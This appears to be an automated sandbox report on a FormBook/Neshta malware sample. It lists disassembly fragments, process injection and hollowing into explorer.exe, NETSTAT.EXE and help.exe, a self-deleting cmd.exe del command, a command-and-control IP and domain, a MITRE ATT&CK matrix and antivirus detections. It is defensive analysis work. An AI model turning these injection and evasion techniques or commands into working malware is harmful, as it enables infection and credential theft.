          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8131B mov eax, dword ptr fs:[00000030h]3_2_00A8131B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CF358 mov eax, dword ptr fs:[00000030h]3_2_009CF358
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CDB40 mov eax, dword ptr fs:[00000030h]3_2_009CDB40
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F3B7A mov eax, dword ptr fs:[00000030h]3_2_009F3B7A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F3B7A mov eax, dword ptr fs:[00000030h]3_2_009F3B7A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98B58 mov eax, dword ptr fs:[00000030h]3_2_00A98B58
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CDB60 mov ecx, dword ptr fs:[00000030h]3_2_009CDB60
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D849B mov eax, dword ptr fs:[00000030h]3_2_009D849B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A814FB mov eax, dword ptr fs:[00000030h]3_2_00A814FB
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46CF0 mov eax, dword ptr fs:[00000030h]3_2_00A46CF0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46CF0 mov eax, dword ptr fs:[00000030h]3_2_00A46CF0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46CF0 mov eax, dword ptr fs:[00000030h]3_2_00A46CF0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98CD6 mov eax, dword ptr fs:[00000030h]3_2_00A98CD6
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9740D mov eax, dword ptr fs:[00000030h]3_2_00A9740D
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9740D mov eax, dword ptr fs:[00000030h]3_2_00A9740D
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9740D mov eax, dword ptr fs:[00000030h]3_2_00A9740D
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]3_2_00A81C06
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46C0A mov eax, dword ptr fs:[00000030h]3_2_00A46C0A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46C0A mov eax, dword ptr fs:[00000030h]3_2_00A46C0A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46C0A mov eax, dword ptr fs:[00000030h]3_2_00A46C0A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46C0A mov eax, dword ptr fs:[00000030h]3_2_00A46C0A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FBC2C mov eax, dword ptr fs:[00000030h]3_2_009FBC2C
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FA44B mov eax, dword ptr fs:[00000030h]3_2_009FA44B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]3_2_009FAC7B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E746D mov eax, dword ptr fs:[00000030h]3_2_009E746D
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5C450 mov eax, dword ptr fs:[00000030h]3_2_00A5C450
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5C450 mov eax, dword ptr fs:[00000030h]3_2_00A5C450
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FFD9B mov eax, dword ptr fs:[00000030h]3_2_009FFD9B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FFD9B mov eax, dword ptr fs:[00000030h]3_2_009FFD9B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A905AC mov eax, dword ptr fs:[00000030h]3_2_00A905AC
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A905AC mov eax, dword ptr fs:[00000030h]3_2_00A905AC
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]3_2_009C2D8A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]3_2_009C2D8A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]3_2_009C2D8A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]3_2_009C2D8A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]3_2_009C2D8A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2581 mov eax, dword ptr fs:[00000030h]3_2_009F2581
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2581 mov eax, dword ptr fs:[00000030h]3_2_009F2581
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2581 mov eax, dword ptr fs:[00000030h]3_2_009F2581
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2581 mov eax, dword ptr fs:[00000030h]3_2_009F2581
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F1DB5 mov eax, dword ptr fs:[00000030h]3_2_009F1DB5
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F1DB5 mov eax, dword ptr fs:[00000030h]3_2_009F1DB5
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F1DB5 mov eax, dword ptr fs:[00000030h]3_2_009F1DB5
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]3_2_00A82D82
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]3_2_00A82D82
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]3_2_00A82D82
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]3_2_00A82D82
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]3_2_00A82D82
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exe Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Domain query: www.agileintelligence.coach
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe Section loaded: unknown target: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Thread register set: target process: 3440
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Thread register set: target process: 3440
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe Thread register set: target process: 3440
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 3440
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: E0000
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: 10A0000
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe Process created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Process created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe Process created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: vi0EwpbUht.exe, 00000001.00000002.584593645.0000000000DB0000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.442375787.00000000083E9000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: vi0EwpbUht.exe, 00000001.00000002.584593645.0000000000DB0000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.336952872.00000000008B8000.00000004.00000020.sdmp Binary or memory string: Progman
          Source: vi0EwpbUht.exe, 00000001.00000002.584593645.0000000000DB0000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.372075782.0000000000EE0000.00000002.00000001.sdmp Binary or memory string: &Program Manager
          Source: vi0EwpbUht.exe, 00000001.00000002.584593645.0000000000DB0000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.372075782.0000000000EE0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe Code function: GetLocaleInfoA,1_2_0040D74C
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe Code function: GetLocaleInfoA,1_2_00403CB4
          Source: C:\Windows\svchost.com Code function: GetLocaleInfoA,5_2_0040D74C
          Source: C:\Windows\svchost.com Code function: GetLocaleInfoA,5_2_00403CB4
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe Code function: 1_2_0040F270 GetLocalTime,1_2_0040F270
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe Code function: 1_2_0040D815 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,1_2_0040D815
          Source: vi0EwpbUht.exe, 00000001.00000003.441467911.00000000022C4000.00000004.00000001.sdmp Binary or memory string: MSASCui.exe
          Source: vi0EwpbUht.exe, 00000001.00000003.441467911.00000000022C4000.00000004.00000001.sdmp Binary or memory string: MsMpEng.exe

          Stealing of Sensitive Information:

          Yara detected FormBook
          Yara detected Neshta
          Source: Yara match; File source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: vi0EwpbUht.exe PID: 7096, type: MEMORY
          Source: Yara match; File source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
          | Valid Accounts | Native API 1 | Windows Service 1 | Windows Service 1 | Deobfuscate/Decode Files or Information 1 | Credential API Hooking 1 | System Time Discovery 1 | Taint Shared Content 1 | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1 |
          | Default Accounts | Shared Modules 1 | Registry Run Keys / Startup Folder 11 | Process Injection 512 | Obfuscated Files or Information 2 | Input Capture 11 | System Network Connections Discovery 1 | Remote Desktop Protocol | Credential API Hooking 1 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
          | Domain Accounts | At (Linux) | Logon Script (Windows) | Registry Run Keys / Startup Folder 11 | Software Packing 11 | Security Account Manager | File and Directory Discovery 4 | SMB/Windows Admin Shares | Input Capture 11 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
          | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Rootkit 1 | NTDS | System Information Discovery 114 | Distributed Component Object Model | Clipboard Data 1 | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud |
          | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 321 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
          | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 31 | Cached Domain Credentials | Security Software Discovery 241 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
          | External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 512 | DCSync | Process Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
          | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Virtualization/Sandbox Evasion 31 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
          | Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
          | Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Network Configuration Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact |

          Behavior Graph

          [Behavior graph image not reproduced. Behavior Graph ID: 432848; Sample: vi0EwpbUht; Startdate: 10/06/2021; Architecture: WINDOWS; Score: 100]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | vi0EwpbUht.exe | 91% | Metadefender | |
          | vi0EwpbUht.exe | 100% | ReversingLabs | Win32.Virus.Neshta |
          | vi0EwpbUht.exe | 100% | Avira | W32/Neshta.A |
          | vi0EwpbUht.exe | 100% | Joe Sandbox ML | |

          Dropped Files

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | 100% | Avira | W32/Neshta.A |
          | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Avira | W32/Neshta.A |
